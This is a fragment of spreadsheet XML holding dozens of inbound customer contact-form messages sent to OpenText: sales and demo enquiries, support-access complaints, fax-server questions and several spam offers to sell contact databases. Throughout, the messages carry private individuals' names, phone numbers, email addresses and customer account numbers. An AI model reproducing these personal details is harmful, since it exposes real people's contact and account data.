Email Appending: We also have email appending service wherein we can add emails and other missing information to your in-house prospect and customer lists. We can do an append test with no cost for you to show you our quality and how the process works. _x000D_
_x000D_
Potential Attendees Database:  We have close to 25,000 potential attendees for this Dreamforce 2017. _x000D_
_x000D_
Key decision makers List: All C-level, VP level, Director level, Manager level, Executives etc. _x000D_
_x000D_
Would you like to see a free sample file? Let me know your target audience._x000D_
_x000D_
Regards,_x000D_
Linda_x000D_
Sales manager_x000D_
408-</t>
  </si>
  <si>
    <t>Quote for three individuals to attend a class at our facility in Salt Lake City, Utah. Include cost, timeframe, and class agendas for the following topics._x000D_
1. ProVision Fundamentals_x000D_
2. ProVision intermediate skills_x000D_
3. ProVision Administration skills</t>
  </si>
  <si>
    <t>I need to verify employment of someone that works at your Draper, Utah plant.  How do I do this?</t>
  </si>
  <si>
    <t xml:space="preserve">My Desk Top has ceased working...again. The program will not launch stating a code mismatch or words to that effect. I deleted the entire program and tried to re-install with no success. Do these "expire" every so often? Must I continue to purchase a new copy every few years or ???? Please advise as I use this program quite a bit and miss not using it. </t>
  </si>
  <si>
    <t>User login and password failed to login and reset. Please advise on new user and password ASAP</t>
  </si>
  <si>
    <t xml:space="preserve">I have a question about an old, but running Archive Services server and procuring support for it. </t>
  </si>
  <si>
    <t>I am teaching a course on Data and Information Management at Ryerson University this fall and wonder if it's possible to have someone come and demo the OpenText software to students.  Or we could go to your headquarters?  Class is Thursday evenings from 6:30-9:30 pm.</t>
  </si>
  <si>
    <t>I would like to know the price for Opentext for CAD Manager 10.5.2.  My client is looking to purchase 50 licenses.  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, hope you are doing great. _x000D_
_x000D_
I am trying to search for a partner in Mexico, could you help me? _x000D_
_x000D_
Best Regards. _x000D_
</t>
  </si>
  <si>
    <t>Interested in learning more about your cloud fax solution.</t>
  </si>
  <si>
    <t xml:space="preserve">need confirmation for recently identified security vulnerabilities for Documentum webtop 6.8.2 </t>
  </si>
  <si>
    <t>Information regarding FOIP server for incoming faxes with a Cisco CM 11.5 environment.  We need to receive to email about 1000 pages of fax / month.  We would want something deployed on premise and have a VMware virtual server environment already in place that we would utilize for any server setups needed.</t>
  </si>
  <si>
    <t>We are a new Zimbabwe based startup and we are developing an application and we require a reporting module to be embedded within the application and we are interested in contemplating whether opentext actuate products can be included within the application for reporting sake._x000D_
_x000D_
Hence it is our need to know the pricing and feature matrix associated with a price for the product.</t>
  </si>
  <si>
    <t>Interested in Contract Management software.</t>
  </si>
  <si>
    <t>Need access to Documentum support and software download as the Documentum product support has been transitioned from Dell/EMC to OpenText. My Site-ID with Dell/EMC is 4313540. Thanks</t>
  </si>
  <si>
    <t>We are hospital with several off site clinic that relies heavily on faxing.  We would like to implement a Hybrid fax solution.  We are currently struggling with bad phone lines and receiving partial faxes.  I would like to be able to utilize a cloud based fax provider to send and receive our faxes, but be able to utilize a in house server to handle the distribution of the inbound  faxing. Is it possible to setup a call to discuss what our options are and  possibly see a demo.</t>
  </si>
  <si>
    <t>HelpForStroke.org_x000D_
3579 E. Foothill Blvd. Suite # 512_x000D_
Pasadena, CA 91107-3119_x000D_
 Office Telephone: (626) 838-5141_x000D_
sapaterson221@gmail.com_x000D_
_x000D_
Friday, September 8, 2017_x000D_
Opentext_x000D_
Department of Charities_x000D_
_x000D_
Dear Opentext, _x000D_
_x000D_
Hello. My Name is Scott Paterson and I am a marketing representative of the non-profit Help For Stroke. I want to schedule a date and time to come in and talk to you about our organization and how we can most efficiently use your charity to create positive change in our community._x000D_
_x000D_
Strokes are the fourth cause of death in the United States and the leading cause of disability. Stroke recovery is costly and time consuming. Undoubtedly you can point to examples in your own workplace of peers becoming afflicted. _x000D_
_x000D_
The mission of Help For Stroke is to expand stroke awareness, provide access to information that prevents the occurrence of stroke, provide useful information on health care and nutrition to the public, survivors as well as caregivers to help prevent the recurrence of stroke._x000D_
_x000D_
Help For Stroke attempts to engage the community with healthy activities, such as our 5K Walk and Run for Stroke Prevention on November 11 at 9:00 am in Victory Park. We also are using our website to model healthy choices. Bill Shuttic, an acclaimed therapist and health coach has a series of demonstrative videos. We are rolling out a series of several dozen healthy cooking demonstrations over the next several weeks. And our in-house favorite series  My Dad Had a Stroke  by Tugene Davis shows the struggle of recovery that all survivors endure._x000D_
_x000D_
We have lots more planned for our revamped website. We want to engage the community with a newsletter as well as post a recipe blog and do other things. But we need your help._x000D_
_x000D_
Sincerely yours,_x000D_
_x000D_
Scott Paterson</t>
  </si>
  <si>
    <t>est-il possible d'avoir une démo de votre plateforme d'assets management. Nous somme en recherche d'un prestataire pour en adopter une nouvelle.</t>
  </si>
  <si>
    <t>I need to upgrade from version 7.1 but do not know how. Our print vendor has instructed us to upgrade to 9.5. Can you possibly help?</t>
  </si>
  <si>
    <t>Mysupport Login not posible, please check account</t>
  </si>
  <si>
    <t>I am existing customer of EMC Documentum which I understand Opentext has taken over, so I need to raise support requests for Documentum Product Lines. Please give me access to Support Center.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to invite OpenText to provide us with a presentation on its records management software systems AND archiving software solutions. </t>
  </si>
  <si>
    <t>PLEASE BLOCK FAX CALLS TO OUR PHONE NUMBER</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Are you interested in maximizing your client base by acquiring the contact list of “Laserfiche” Users? _x000D_
Data Fields – Company, contact name (First, Middle and Last name), title, website, telephone, fax, mailing address with street address, city, state, zip code, country code, SIC, NAICs Code, Industry, Revenue, Employee size, Email address, LinkedIn URLs (wherever available).  _x000D_
Can we connect on a quick discovery call to discuss the same? Alternatively you can help us know your target market and titles; we will be able to provide you the key decision makers’ database for your competitor._x000D_
I am looking forward to hear from you._x000D_
Regards,_x000D_
Candace Nelson_x000D_
Demand Generation Team_x000D_
</t>
  </si>
  <si>
    <t>Jag utreder för kunds räkning möjliga produkter för att gå från en mappabaserad gemensam disk (G:) till ett modernare systemstöd för delning av gemensamma filer._x000D_
Har ni några kunder som har gjort just detta, som jag kan kontakta för att ta del av deras erfarenheter?_x000D_
Mvh_x000D_
Peter Falk</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
We have recently been approached by a Client to propose and implement a robust Electronic Document Management system (eDMS) in their environment which could simplify their processes and harmonies data. The organization, among other document related activities it undergoes, is a Certificate issuing and verification Organization. Payments are made and certificates generated in reference to payment. It has state offices all over Nigeria and needs to harmonize the way it generates, manages, distributes, stores and verify the authenticity of Documents and Certificates._x000D_
_x000D_
Some of their unique requirements include;_x000D_
•	Easy document Archiving and retrieval. _x000D_
•	Document encryption with eSeal (or other verification technology)._x000D_
•	Able to verify/validate certificates electronically and manually._x000D_
•	Version review, comparism and management._x000D_
•	Payment harmonization and management._x000D_
_x000D_
This is among her other document related services which they hope the solution will accommodate._x000D_
In view of this request, we have identified your solution as meeting the requirement of the Client and would like to Partner with you in this environment. We therefore request for a technical Proposal for the Client with details of how your solution is ideal for their environment._x000D_
_x000D_
About Us:_x000D_
Puzzles Technologies Limited is a subsidiary of Puzzles Group, a conglomerate of companies covering different sectors of the socio-economic environment of Nigeria and beyond. Over the years we have developed and partners with other world leaders, system integrators, solutions providers and Original Equipment Manufacturers in deploying technology driven solution that addresses basic to complex business processes. _x000D_
We are well rooted in the Nigerian Political landscape of the country and have supported several Private and Government Ministries and Agencies in fulfilling their statutory mandate by deploying  several systems and solutions such as; ePayment, eCollections, ePlatform and Hybrid Biometr</t>
  </si>
  <si>
    <t>Sir_x000D_
We are from Mozilla Firefox Developers Group, a technical club of VIT University, Vellore. The College is going to hold one of the India’s top technical college festivals, GRAVITAS._x000D_
We would love you to sponser one of our events with a few deliverables for the board members of the club. The festival is from 22nd September. We have a lot of ideas innovative an specular and thus ask for your interest for further discussions._x000D_
Greets_x000D_
Anurag Raj_x000D_
Vice President, Mozilla Firefox Developers Group, VIT</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We are AURUM SOFTWARE resellers of software based in Bangalore India. One of my customer Boeing India is looking for  Exceed OnDemand version 13.8.7.844 client - 14 EA. Could you send us the pricing_x000D_
Regards_x000D_
for AURUM SOFTWARE_x000D_
Balaji_x000D_
9845568278_x000D_
</t>
  </si>
  <si>
    <t>I'm trying to register my access to the Partner portal for 2 reasons: 1) to complete the mandatory learning modules for the CEM product suite 2) to access marketing resources. In both cases when I access this URL https://partners.opentext.com/enablement-and-support/ there is no content, the headers and dropdown options appear but there is just a blank central screen as if I have no access rights to the content. Can you please grant me the correct access?</t>
  </si>
  <si>
    <t>We need your help on the documentum Products</t>
  </si>
  <si>
    <t>Hello there,_x000D_
_x000D_
We are interested in smart solutions for documents, if you have an office or partners in Turkey, we will contact with them to work together._x000D_
_x000D_
I would like you to return in a short time,_x000D_
_x000D_
Best regards,</t>
  </si>
  <si>
    <t>Provide a quote for Spicer Imagenation[Latest Version] tool</t>
  </si>
  <si>
    <t>Interested in a product demo of the OEM version of Birt</t>
  </si>
  <si>
    <t>Please get me confirmed!  I've done the confirmation email about 3 times and it's asking for a 4th.  I need to know what the requirements for a purge are.</t>
  </si>
  <si>
    <t>I am interested in hosting our OpenText environment in your cloud infrastructure. Firstly do you have pricing in regards to IaaS and SaaS solutions. Secondly do you have a presence in Australia or will the application be hosted in the US. Regards Alex</t>
  </si>
  <si>
    <t>Hi, I'd like to get some indicative pricing for the OpenText Content Suite</t>
  </si>
  <si>
    <t>Need pricing info on ECM, and details on how well it integrates with Sharepoint, ASAP! Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo, Ich bin Associate Consultant bei einer Unternehmensberatung und bin auf der Suche nach automatischer intelligenter Dokumenten-Bearbeitung. _x000D_
LG, Andrea Bulfone_x000D_
</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
Would you be interested in Salesforce Users Database? _x000D_
_x000D_
We can provide all the decision makers like CEO's, CFO's, CIO's, CMO's and VP's Etc., with verified email address, phone numbers, Fax and Etc.,_x000D_
_x000D_
Let me know your target audience, so that I can give you more information, Pricing and Counts and few sample for your review._x000D_
_x000D_
Best Regards,_x000D_
Emily Tracy,_x000D_
emily.tracy.us@gmail.com,_x000D_
Marketing Manager._x000D_
http://aidedigitals.com/</t>
  </si>
  <si>
    <t>Working on bid for 20 Sharp copiers and bid requires connectivity from MFP to RightFax.  Need to know what is necessary to run RightFax using Sharp MFP enabled with Sharp OSA platform.</t>
  </si>
  <si>
    <t>To Whom It May Concern,_x000D_
_x000D_
My name is Bradley Burrows.  I have a Bachelor of Applied Science in Civil Engineering from the University of Waterloo.  I also have graduate research experience and two years of work experience as a Water Resources Engineer-In-Training.  I have a keen interest in changing careers to software development or a related field._x000D_
_x000D_
I am seeking a company which has the reputation of being a leader in the industry.  OpenText has a solid foundation in the tech industry and I would be thrilled to gain some insight and guidance for my entry into the development field._x000D_
_x000D_
I would like to request an information interview in order to learn more about your company, the work you do and the expectations you have for your staff.  I have developed professional skills and qualities through my graduate research and Engineer-In-Training work experience that would allow me to transition from engineering to development.  As part of my undergraduate degree, I have developed some coding skills.  I have novice development experience using VBA/Grapher/Matlab, and want to expand my knowledge and experience.  I would like to ascertain what I would need to learn (courses, computer languages or internships) in order to be considered for future positions at OpenText.  I look forward to hearing from you and appreciate your help on this matter._x000D_
_x000D_
Thank you,_x000D_
Bradley Burrows_x000D_
(519) 504-5405</t>
  </si>
  <si>
    <t>My company is looking for a solution to convert our existing PDF documents into Accessible PDF documents for any external member documents (ex. Explanation of Benefits, etc).  We are looking for a product that can do this automatically._x000D_
_x000D_
Thanks,_x000D_
Scott Morin_x000D_
Blue Cross Blue Shield of Louisiana</t>
  </si>
  <si>
    <t>I need to raise ticket so that I can get resolution for the issues faced in cordys BOP 10.7 version of BPM. I need to have an account for that to get a support on production issues.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Wondering I'm trying to install Enterprise Scan from following link from my co-worker which direct me to no access!_x000D_
Awaited support,_x000D_
Thanks &amp; Regards,_x000D_
_x000D_
https://login.opentext.com/connect/sso_controller-profile?sys_action=sso_noperms_kc_css</t>
  </si>
  <si>
    <t xml:space="preserve">Running a virtual RightFax 10.0.0.4 server (installed in 2010).  Doesn't work with 16 new Xerox AltaLink C8055 copiers.  We had been using Instant InfoSystems as a reseller/support for RightFax.  They no longer are do this.  Who can I contact for upgrade path to latest RightFax version and pricing?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in acquiring Cloudera Clients list for your sales, marketing and promotional purpose?_x000D_
_x000D_
List Contains: Name, Company's Name, Phone Number, Fax Number, Job Title, Email address, Complete Mailing Address, SIC code, Company revenue, size, Web address etc._x000D_
_x000D_
We do provide: - Hortonworks, Hadoop, Cloudera 2017 and much more. _x000D_
_x000D_
Please send me your target audience and geographical area, so that I can come back to you with further details._x000D_
_x000D_
You can also let me know if you have a different target audience_x000D_
_x000D_
Please review and let me know your thoughts._x000D_
_x000D_
Regards,_x000D_
Rio Roy_x000D_
</t>
  </si>
  <si>
    <t>Access to AX License Server v.8.1 SP2 to work on NFR request</t>
  </si>
  <si>
    <t>Interested in implementing process suite - cloud workflow and business processes to simplify and streamline internal process sharing across the organisation and maintenance thereof</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext,_x000D_
The Retention Regulation Team of Goldman Sachs India is using your product AXSOne and there is a query around changing the storage from the current product (Centera) to a new updated one. Can you please revert back and set up a time to discuss this further on call._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello Open Text Team!_x000D_
I need your help!_x000D_
It would be nice, if you could right me an agreement verification._x000D_
I am a tutor for languages. I ´ve worked from 01.2011 until 12.2016 in Luxembourg. My students name is Sabrina Gidinelli._x000D_
It was noticed in my list that I tought her 355h (A1-B1 level)_x000D_
It would be fantastic, if you could confirm this for me._x000D_
Many thanks in advance. For any question pleace don´t hasitate to conatct me._x000D_
Susanna Schäfer_x000D_
</t>
  </si>
  <si>
    <t>I just register in the opentext site but I did not see the partners options to register in the presales training. Part of my team has the same issue (pgonzalez@ecmsolutions.com.mx)</t>
  </si>
  <si>
    <t>We are having issues with our Faxpress v 6-1-2011-23.  We are continually restarting the server to refresh the lines.  We have a lot of routing errors (9300), local aborts (0019) and remote aborts (0018).  We are covered under a service contract with you - 0012116814 RC181612.  The current situation is unacceptable.  I don't know if we need an update, maintenance or to look at a new faxing solution.  We currently are using analog.  Should we be looking at ip based?  I would appreciate a call to discuss this issue.  Thank you.</t>
  </si>
  <si>
    <t>I am not able to access knowledge base information such as http://knowledge.opentext.com/knowledge/cs.dll/kcs/kbarticle/view/KB6328974 when ever tech support refer me.  Please give me access.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">I need some information on implementing a document (SOPs, Forms) and training management system for our company. We have approximately 350 employees._x000D_
</t>
  </si>
  <si>
    <t>I want to take the course 2-0120 Opentext Record Management 10.5, do you have future date for that course beside the 14-15 of September? Thank you</t>
  </si>
  <si>
    <t>I need to sign in and I can't remember our Network ID. Please Assist._x000D_
_x000D_
Our Account Number is US01-105705_x000D_
_x000D_
Thank you,_x000D_
Doug</t>
  </si>
  <si>
    <t xml:space="preserve">Pricing. </t>
  </si>
  <si>
    <t>Want to know if RightFax is compatible with S/4HANA</t>
  </si>
  <si>
    <t>I would like a listing of your support partners in the WNY Area, Please.</t>
  </si>
  <si>
    <t>sent contact info sales rep called me and got info.  However no one reached out to me about this.  I am looking to do faxing through the cloud..._x000D_
looking at about 10k outbound at the moment per month.</t>
  </si>
  <si>
    <t>interested in using OpenText internally at Accenture for my team.</t>
  </si>
  <si>
    <t xml:space="preserve">Need refund for duplicate payment no response from _x000D_
Anthony Echauz_x000D_
Intermediate Accts Receivable Accountant | Accounts Receivable_x000D_
Phone:	800 862 7128 X 8888 944	 _x000D_
Website:	www.opentext.com_x000D_
 _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Business Opportunity </t>
  </si>
  <si>
    <t>I think my previous contacts are no longer working with Optimost/Opentext. Could you direct this to the right person? (potential corporate client in Netherlands)._x000D_
_x000D_
//_x000D_
_x000D_
Hi Sarah,_x000D_
_x000D_
OrangeValley has been working with several KPN labels on the topic of web performance and with Simyo on CRO over the last 2 years._x000D_
_x000D_
Given challenges with the current AB testing tool they are using we have been asked by Simyo to evaluate other tools. Other labels are also investigating the topic of AB testing tools and the impact on their web performance KPIs for 2017 and 2018. For the moment we are reaching out to you on behalf of Simyo. We do already take into account preferences the other KPN labels have in our decision to invite vendors._x000D_
_x000D_
_x000D_
The first step of that evaluation will be purely focused on web performance. The process for this will roughly look as follows_x000D_
_x000D_
_x000D_
1. Simyo will create copies of www.simyo.nl/sim-only with the snippet implementation you recommend for your tool_x000D_
_x000D_
2. Vendors will be asked to setup a number of pre-determined experiments so that you can ensure a optimal implementation_x000D_
_x000D_
3. OrangeValley will provide measurement data to Simyo using Speedcurve as a tool (the KPIs will be provided in advance, both site speed and flicker effect will be taken into account)._x000D_
_x000D_
4. Simyo/OrangeValley select about 2-3 vendors to move forward with for further evaluation_x000D_
_x000D_
_x000D_
_x000D_
Are you interested to participate and who will be the main contact person for further communication?_x000D_
_x000D_
Best,_x000D_
Peter</t>
  </si>
  <si>
    <t>Dear Colleagues,_x000D_
_x000D_
I need access to my case:_x000D_
https://urldefense.proofpoint.com/v2/url?u=https-3A__support.opentext.com&amp;d=DwIFAg&amp;c=jf_iaSHvJObTbx-siA1ZOg&amp;r=SYKvL967Up69wZe4hN00_1GN1POEih_kQd0nl5BCD7Q&amp;m=1rwUoA2m74bLKPfJ_tGPIAqbAjQHchVqAW-QmtzJSvM&amp;s=fWpFNzj52Vvwba5lc59IU5oBDzdjP_mQhdhYBpAkg94&amp;e= _x000D_
_x000D_
Could you please grant required permissions to my account: krzysztof.ligmanowski@pl.ibm.com_x000D_
_x000D_
Best regards,_x000D_
Kris</t>
  </si>
  <si>
    <t>YOu HAVE NOT CONTACTED ME, HELPED OR DONE ANYTHING, I HAVE SENT NUMEROUS EMAILS TO connect@opentext.com are going unanswered and under GDPR my DATA from EMC should have been copied across, IT HAS NOT!_x000D_
_x000D_
PLEASE REPLY!!!!! As you have NOT replied to my previous use of this CONTACT FORM._x000D_
_x000D_
Really, Really poor!_x000D_
_x000D_
Hans.</t>
  </si>
  <si>
    <t>Our Company is considering to replace our fax machines with a virtual mail service, to allow our employees to send and receive faxes through email._x000D_
_x000D_
We need to contact a comercial to help us evaluate a solution based on RightFax.</t>
  </si>
  <si>
    <t>No Access to my support page</t>
  </si>
  <si>
    <t>Hi Editor,_x000D_
_x000D_
I would like to contribute an article/blog to your website. Please connect me to the right person._x000D_
_x000D_
Regards,_x000D_
Sonal_x000D_
Senior Content Writer</t>
  </si>
  <si>
    <t>Can the "Repository encryption" and "Electronic signatures" functions of Documentum Trusted Content Services rely on a Hardware Security Module ?</t>
  </si>
  <si>
    <t xml:space="preserve">Upgrade ERP-System_x000D_
Sehr geehrte Damen und Herren, wir benötigen für unsere Rechnungen eine gültige PO-Nummer. Von wem erhalten wir die?_x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
_x000D_
R. Rupp (Buchhaltung)_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren._x000D_
_x000D_
Ich arbeite im Qualitätsmanagement und interessiere mich für ihre Art die Prozesse zu dokumentieren, lenken. Wie kann man die Daten/Prozessschritte Modellieren und wie werden Schnittstellen zwischen den Prozessen dargestellt?_x000D_
Leider finde ich hierzu wenig auf Ihrer Netz Seite. Können sie mir weiterführende Informationen bereitstellen?_x000D_
_x000D_
Mit freundlichem Gruß _x000D_
_x000D_
Ina Rauh</t>
  </si>
  <si>
    <t>We want to evaluate how your team can help us manage our IP Registry along with any Digital asset management tools you may have. The parent company of ours is based out of US, New York and the subsidiary is based out of India, Mumbai. Please suggest a good time when we can discuss this with you.</t>
  </si>
  <si>
    <t>My company is interested in procuring a 'Document Management Software' and we are looking at 'Documentum' as an option. Could you connect me to the right office for enquiry?</t>
  </si>
  <si>
    <t>We are a partner of OpenText and would like to subscribe to one year Learning On Demand. _x000D_
Could you please issue us a quotation for the subscription fee with the discount? Thanks.</t>
  </si>
  <si>
    <t>check branch office in india</t>
  </si>
  <si>
    <t>Product pricing</t>
  </si>
  <si>
    <t xml:space="preserve">I have been trying to get someone to contact me about my existing service and new services for the upcoming year. I have an existing contract that has been scheduled to cancel, but I would like to review what services could be provided to me for this next year based on what services/usages we have used over the last year(s)._x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>interested in redaction solutions</t>
  </si>
  <si>
    <t>Would like to discuss content distribution options.</t>
  </si>
  <si>
    <t>We are looking to replace the current ECM system.</t>
  </si>
  <si>
    <t>I am trying to create an account to bill out customer at the following link but it is telling me that I need an invite to create an account. the link I am using is https://tradinggrid.gxs.com/TigerLogin/public/login/login.do?TYPE=33554433&amp;REALMOID=06-000ac6a6-da9c-1243-8fa3-8309126f304d&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=-SM-Thww9oSPCLnMm0Tx6rO2eKJX1Bk6rE5fUrp0l6pxvk2bU096a3vU5S9E2OHf0%2fxU&amp;TARGET=-SM-https%3a%2f%2ftradinggrid%2egxs%2ecom%2fTigerPortal%2f</t>
  </si>
  <si>
    <t xml:space="preserve">I am unable to view my SR or submit a new SR or click on my Support link. _x000D_
Here what happen:_x000D_
 1. After I login, I get a screen display:_x000D_
         Almost there!_x000D_
         Request Confirmation Email._x000D_
2 - I received an e-mail, click on Confirm Registration._x000D_
3 - Log back in, and I can see Manage your account screen._x000D_
4 - Click on My support Link, I get the screen in step 1 again._x000D_
I tried it many times._x000D_
Please help._x000D_
_x000D_
Bunna </t>
  </si>
  <si>
    <t>Hello i am contacting opentext to see if they offer ApplicationXtender Cold Feed training? I know when ApplicationXtender was previously emc they offered a Cold Feed training and didnt know if opentext offered this?</t>
  </si>
  <si>
    <t xml:space="preserve">19044: Login Error. </t>
  </si>
  <si>
    <t>Please grant me access to OPenText Support portal to raise tickets. I am unable to access with my EMC user ID and password.</t>
  </si>
  <si>
    <t>We are offering cost free recruitment assistance for your IT professionals with strong financial incentives to offset your hiring costs. We have  a large number of experienced IT professionals with additional .Net IT certification from Humber College eager to continue their IT careers in Canada. Please contact me to find out more and how we can help  your recruit the best for your business.</t>
  </si>
  <si>
    <t xml:space="preserve">Please provide a quote for the OpenText renewals, this is for US STRATCOM Contract, end-user is US Airforce:_x000D_
_x000D_
MAINT-EXMPI550700M-4, qty 281,Open Text Exceed MNT 200-499U_x000D_
MAINT-SPMPI570700M-4, qty 281, Open Text Secureshell MNT 200-499U_x000D_
_x000D_
Thank you </t>
  </si>
  <si>
    <t>OpenTex Brava for Microsoft SharePoint will work on SharePoint 2016? if yes please share the pricing.</t>
  </si>
  <si>
    <t>We are unable to submit a help desk ticket for our products; it appears that documentum accounts are being transitions and our has not been done successfully at this time.</t>
  </si>
  <si>
    <t>Can you please let me know when OT will be offering 3-0126 System and Search Administration v10.5 SP1 after Sept. 25?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of EMR &amp; Clinic Management Software Users?_x000D_
_x000D_
This list Contains Company name , Web address ,Contact name, Phone number, Email address, Title, physical address, City, State ,Zip Code, Country, Phone number, Fax Number, Employee size and last verified date._x000D_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</si>
  <si>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Building a new server to replace an older RightFax 9.4 server and would like to move away from our current 8 analog channels.  Is it possible to upgrade from analog to foip and if so what is the cost?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, i bought the Brava! Desktop DXP-N yesterday. Now i can't download the source. Pleace send me a Downloadlink. Thanks! </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi,_x000D_
_x000D_
Would you be interested to purchase fresh contact information of Healthcare decision makers?  In our all-out effort to prove how good our VOS Marketing contacts are due to our proprietary filtering process, we would like to offer a complimentary test sample._x000D_
_x000D_
If there's any interest, please contact me personally.  Give us one chance and we'll grow your business forever!_x000D_
_x000D_
Only The Best,_x000D_
_x000D_
Nathan Jones_x000D_
VP Alliance program_x000D_
VOS Marketing_x000D_
949-313-0132_x000D_
www.vos-marketing.com_x000D_
CA - USA_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Is it possible for you to tell me when support for Exceed 2008 stopped?  The http://connectivity.opentext.com/customer-care/connectivity.aspx page tells me that it is no longer supported, but does not provide me with when that support ended. </t>
  </si>
  <si>
    <t>I would like a demo of the Email Filing eDOCS Edition and price quote._x000D_
Thanks.</t>
  </si>
  <si>
    <t>After your move from EMC I cannot access any support tickets, create support requests of do anything, well done! , please fix.. ASAP</t>
  </si>
  <si>
    <t xml:space="preserve">All my emails got wiped clear. I have nothing in my inbox, sent, ect. I do need these emails. </t>
  </si>
  <si>
    <t xml:space="preserve">I came across your website after searching training providers on trainingindustry.com_x000D_
And I was wondering if you would like to partner up?_x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote what you do online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second whiteboard video for your charity for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more or get started at http://www.30secondexplainervideos.com/whiteboard-promo_x000D_
_x000D_
Or you can shoot me a quick email if you had any questions!_x000D_
_x000D_
Cheers, _x000D_
Travis _x000D_
http://www.30secondexplainervideos.com/whiteboard-promo_x000D_
</t>
  </si>
  <si>
    <t>I would like to get details of the UK distributors for the right fax product range. Can someone please provide me with these details?</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
Je suis à la recherche d'une solution de stockage de documents confidentiels pour l'un de nos clients, celui souhaiterait mettre à la disposition de ces clients internes et externes des documents, et pouvoir tracer la connexion et la consultation de ces documents. _x000D_
Oodrive m'a déjà fait une proposition d'iExtranet, j'ai voulu contacter EMC, ces derniers m'ont prévenu qu'Opentext gérait la partie eroom désormais._x000D_
je vous remercie de revenir vers moi dès que possible._x000D_
_x000D_
Cordialement,</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are on the process of looking for consultancy firm that could assist GHD in developing an Enterprise Information Management (EIM) Framework._x000D_
_x000D_
GHD is one of the world's leading professional services companies operating in the global markets of water, energy and resources, environment, property and buildings, and transportation. It provides engineering, architecture, environmental and construction services to private and public sector clients._x000D_
_x000D_
Established in 1928 and privately owned by our people, GHD provides engineering, architecture, environmental and construction services to private and public sector clients across Asia, Australia, Europe, North and South America and the Pacific region. Focused on creating lasting community benefit with a commitment to client service excellence, our connected global network of over 8500 people delivers projects with high standards of safety, quality and ethics._x000D_
_x000D_
Like most companies in the technologies industry, GHD is searching for opportunities that will allow GHD to further differentiate itself from the competition through improved knowledge of its data and information across and within projects, and from other perspectives._x000D_
_x000D_
What we would like to accomplish in this initiative is to come up an Enterprise Information Management Framework that defines our GHD information with:_x000D_
•	Description (Consistency, Metadata, Taxonomy)_x000D_
•	Ownership (Custodianship, Accountability)_x000D_
•	Security (Privacy, Confidentiality, Sensitivity)_x000D_
•	Compliance (Standards, Legislation/Regulations)_x000D_
•	Sharing (Access Rights, Openness, Reuse)_x000D_
•	Quality (Accuracy, Timeliness, Value)_x000D_
_x000D_
_x000D_
To facilitate this improved understanding and access to data and information, GHD has decided to explore the development of an EIM framework, starting with an assessment of its vast information and its components and recommend solution to GHD, EIM strategy and realistic road map._x000D_
_x000D_
We would be happy if you could provide a presentation/session of your EIM so</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to have full access to Opentext. Could you grant it for me?_x000D_
_x000D_
Thanks and regards,_x000D_
Hien</t>
  </si>
  <si>
    <t>Dear Sir / Madam,_x000D_
_x000D_
Comprobo, a London based biometric verification business specializing in online invigilation, training and remote proctoring would welcome the opportunity to discuss the potential of a partnership relationship with OpenText._x000D_
_x000D_
Comprobo have developed a SaaS (Software as a Service) based cloud solution that ensures that the correct candidate has seen and paid attention to whole assignments using periodic webcam capture, biometric facial matching and attention monitoring technology. _x000D_
_x000D_
Our solution removes the need for human invigilators or proctors and through AI algorithms is able to flag suspicious activity when it is detected, minimising supervision and monitoring. It gives candidates the flexibility to take critical tests at a location of their choosing under the same invigilation conditions as if they were at an examination centre _x000D_
_x000D_
Comprobo’s solution is available anytime and anywhere (web based solution – no download required) and is both user-journey focused as well as being evidence and compliance driven._x000D_
_x000D_
We have now reached that stage of our growth cycle where the forging of relationships with like-minded but complementary technology partners would be ideal. Especially LMS providers, who we know (from recent news reports) are increasingly forming collaborative arrangements and partnerships with remote proctoring / invigilation solution providers._x000D_
_x000D_
We therefore view OpenText as a potential partner who we would like to work with in order to develop collaborative strategies, approaches and offerings aimed at:_x000D_
_x000D_
•	Challenging the prevailing test centre model by offering a viable alternative _x000D_
•	Adding an additional layer of governance (ID verification) where testing is already done on line_x000D_
•	Opening up brand new markets for our clients_x000D_
•	Widening our client audience reach through further ‘enfranchisement’ of their learning programmes_x000D_
•	Delivering significant cost efficiencies for our clients_x000D_
Thank you for your time and we trus</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam,_x000D_
_x000D_
Comprobo, a London based biometric verification business specializing in online invigilation, training and remote proctoring would welcome the opportunity to discuss the potential of a partnership relationship with Open Text._x000D_
_x000D_
Comprobo www.comprobo.co.uk have developed a SaaS (Software as a Service) based cloud solution that ensures that the correct candidate has seen and paid attention to whole assignments using periodic webcam capture, biometric facial matching and attention monitoring technology. _x000D_
_x000D_
Our solution removes the need for human invigilators or proctors and through AI algorithms is able to flag suspicious activity when it is detected, minimising supervision and monitoring. It gives candidates the flexibility to take critical tests at a location of their choosing under the same invigilation conditions as if they were at an examination centre _x000D_
_x000D_
